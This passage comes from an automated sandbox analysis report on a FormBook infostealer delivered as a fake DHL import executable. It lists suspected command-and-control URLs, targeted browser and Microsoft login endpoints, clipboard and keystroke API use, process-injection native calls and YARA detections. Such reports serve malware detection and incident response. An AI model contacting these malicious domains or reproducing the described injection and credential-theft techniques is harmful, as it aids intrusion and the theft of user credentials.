3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: net.exe, 00000007.00000002.3519002309.00000000043C2000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000003A72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://roopiedutech.online/3m9t/?XbDhGVR=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHi
                Source: net.exe, 00000007.00000002.3519002309.0000000003F0C000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.00000000035BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.gokulmohan.online/xh7d/?XbDhGVR=lbj31sdPKdIucqFOkkGE3KM3
                Source: AUHJGnjYgKTjWw.exe, 00000009.00000002.3520205826.0000000005026000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.harmonid.life
                Source: AUHJGnjYgKTjWw.exe, 00000009.00000002.3520205826.0000000005026000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.harmonid.life/aq3t/
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 00000007.00000002.3519002309.00000000038C4000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000002F74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FFB4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/)
                Source: net.exe, 00000007.00000002.3519002309.00000000038C4000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000002F74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FFB4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
                Source: net.exe, 00000007.00000002.3517458773.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 00000007.00000002.3517458773.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 00000007.00000002.3517458773.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 00000007.00000002.3517458773.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: net.exe, 00000007.00000002.3517458773.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 00000007.00000002.3517458773.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 00000007.00000003.2306623839.000000000774C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: net.exe, 00000007.00000002.3519002309.0000000003A56000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000003106000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://vrxlzluy.shop/o91n/?XbDhGVR=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0084EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0084EAFF
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0084ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0084ED6A
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0084EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0084EAFF
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0083AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0083AA57
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00869576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00869576

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2108161360.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3518328881.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3518268838.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3517222370.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3518477270.0000000003CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2108497197.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2107863042.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3520205826.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: DHL_IMPORT_8236820594.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: DHL_IMPORT_8236820594.exe, 00000000.00000000.1659040900.0000000000892000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cbd6a012-0
                Source: DHL_IMPORT_8236820594.exe, 00000000.00000000.1659040900.0000000000892000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8c8a5f66-b
                Source: DHL_IMPORT_8236820594.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_14691e13-5
                Source: DHL_IMPORT_8236820594.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9947b83a-b
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CC23 NtClose,2_2_0042CC23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,2_2_039735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,2_2_03972BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,2_2_03972AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,2_2_03972F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,2_2_03972FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,2_2_03972F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,2_2_03972E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,2_2_03972EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,2_2_03972DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,2_2_03972D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,2_2_03972CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,2_2_03972C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F24340 NtSetContextThread,LdrInitializeThunk,7_2_02F24340
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F24650 NtSuspendThread,LdrInitializeThunk,7_2_02F24650
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22AF0 NtWriteFile,LdrInitializeThunk,7_2_02F22AF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22AD0 NtReadFile,LdrInitializeThunk,7_2_02F22AD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02F22BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02F22BE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02F22BA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22B60 NtClose,LdrInitializeThunk,7_2_02F22B60
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02F22EE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02F22E80
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22FE0 NtCreateFile,LdrInitializeThunk,7_2_02F22FE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22FB0 NtResumeThread,LdrInitializeThunk,7_2_02F22FB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22F30 NtCreateSection,LdrInitializeThunk,7_2_02F22F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02F22CA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02F22C70
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22C60 NtCreateKey,LdrInitializeThunk,7_2_02F22C60
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02F22DF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22DD0 NtDelayExecution,LdrInitializeThunk,7_2_02F22DD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02F22D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02F22D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F235C0 NtCreateMutant,LdrInitializeThunk,7_2_02F235C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F239B0 NtGetContextThread,LdrInitializeThunk,7_2_02F239B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22AB0 NtWaitForSingleObject,7_2_02F22AB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22B80 NtQueryInformationFile,7_2_02F22B80
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22EA0 NtAdjustPrivilegesToken,7_2_02F22EA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22E30 NtWriteVirtualMemory,7_2_02F22E30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22FA0 NtQuerySection,7_2_02F22FA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22F90 NtProtectVirtualMemory,7_2_02F22F90
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22F60 NtCreateProcessEx,7_2_02F22F60
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22CF0 NtOpenProcess,7_2_02F22CF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22CC0 NtQueryVirtualMemory,7_2_02F22CC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22C00 NtQueryInformationProcess,7_2_02F22C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22DB0 NtEnumerateKey,7_2_02F22DB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F22D00 NtSetInformationFile,7_2_02F22D00
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F23090 NtSetValueKey,7_2_02F23090
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F23010 NtOpenDirectoryObject,7_2_02F23010
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F23D70 NtOpenThread,7_2_02F23D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F23D10 NtOpenProcessToken,7_2_02F23D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004A9400 NtCreateFile,7_2_004A9400
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004A9560 NtReadFile,7_2_004A9560
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004A9650 NtDeleteFile,7_2_004A9650
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004A96F0 NtClose,7_2_004A96F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004A9850 NtAllocateVirtualMemory,7_2_004A9850
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0083D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0083D5EB
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00831201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00831201
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0083E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0083E8F6
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007D80600_2_007D8060
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_008420460_2_00842046
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_008382980_2_00838298
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0080E4FF0_2_0080E4FF
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0080676B0_2_0080676B
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_008648730_2_00864873
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007DCAF00_2_007DCAF0
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007FCAA00_2_007FCAA0
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007ECC390_2_007ECC39
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00806DD90_2_00806DD9
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007EB1190_2_007EB119
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007D91C00_2_007D91C0
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F13940_2_007F1394
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F17060_2_007F1706
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F781B0_2_007F781B
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007E997D0_2_007E997D
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007D79200_2_007D7920
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F19B00_2_007F19B0
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F7A4A0_2_007F7A4A
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F1C770_2_007F1C77
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F7CA70_2_007F7CA7
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00809EEE0_2_00809EEE
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0085BE440_2_0085BE44
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F1F320_2_007F1F32
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_03ABD4900_2_03ABD490
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418CE32_2_00418CE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E8632_2_0040E863
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029C02_2_004029C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F2632_2_0042F263
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032B02_2_004032B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004105C32_2_004105C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025FE2_2_004025FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004105BA2_2_004105BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026002_2_00402600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E802_2_00402E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416F232_2_00416F23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004107E32_2_004107E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A003E62_2_03A003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F02_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA3522_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C02C02_2_039C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E02742_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A001AA2_2_03A001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F41A22_2_039F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F81CC2_2_039F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA1182_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039301002_2_03930100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C81582_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D20002_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C02_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039647502_2_03964750
